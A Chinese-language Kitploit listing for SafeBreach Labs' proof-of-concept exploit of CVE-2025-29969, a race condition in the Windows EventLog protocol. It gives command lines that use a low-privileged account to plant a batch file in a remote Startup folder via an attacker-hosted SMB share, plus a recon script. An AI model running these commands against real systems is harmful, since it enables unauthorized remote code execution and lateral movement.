Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
EventLogin-CVE-2025-29969 — CVE-2025-29969 漏洞利用 | Kitploit
工具/GitHubGitHub/safebreach-labs/eventlogin-cve-2025-29969
权限提升侦察漏洞分析漏洞利用横向移动渗透测试
GitHubsafebreach-labs/eventlogin-cve-2025-29969

EventLogin-CVE-2025-29969

CVE-2025-29969 漏洞利用

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
691536个月前Kitploit 审核通过

EventLogin - CVE-2025-29969

EventLogin 是 MS-EVEN 协议中的一种检查时间与使用时间(TOCTOU)竞争条件漏洞。该漏洞使低权限用户能够向远程机器写入任意文件,从而无需管理员账户即可执行远程写入。

本仓库包含两个脚本:一个利用此漏洞(write_file_remotely.py),另一个利用漏洞的原始功能,以低权限用户身份检查远程文件是否存在——这在查看域中其他计算机上已安装的程序等场景下非常有用。

完整分析请参阅:

EventLog-in: 利用弱凭据通过微软 Windows 中的事件日志服务传播

write_file_remotely 的使用方法

首先,使用 impacket 创建一个 SMB 共享:

root@kitploit:~
impacket-smbserver -smb2support Share /tmp/safebreach

注意:脚本中硬编码了共享名 'Share',如需修改请自行调整。

然后,运行 write_file_remotely.py 脚本并包含所有必需参数:

  1. ip_to_attack - 远程机器的 IP 地址。
  2. smb_server_ip - 你开启共享的机器 IP(可以是攻击机)。
  3. username 和 password - 低权限账户的凭据。
  4. valid_evtx_file_path - 存储在之前开启的共享中的有效 EVTX 文件路径。
  5. local_file_path - 你要上传的文件。
  6. remote_file_path - 你要上传到的远程文件路径。

示例:

root@kitploit:~
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"

check_if_exists 的使用方法

此脚本本身不利用漏洞,仅使用"CreateFile"原始功能,可用于网络侦察。

例如,域中远程机器的 Program Files 目录对全体"Users"组可访问,这意味着使用任意用户的凭据即可检查另一台机器上是否存在某个文件。

它接受以下参数:

  1. ip_to_attack - 要侦察的 IP 地址
  2. username - 域用户的用户名和密码
  3. filepath_to_check - 要检查的文件路径

例如,使用低权限用户检查域控制器(192.168.56.57)上是否安装了 Wireshark。

root@kitploit:~
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"

结果:
FILE_EXISTS_AND_IS_DIRECTORY
下载工具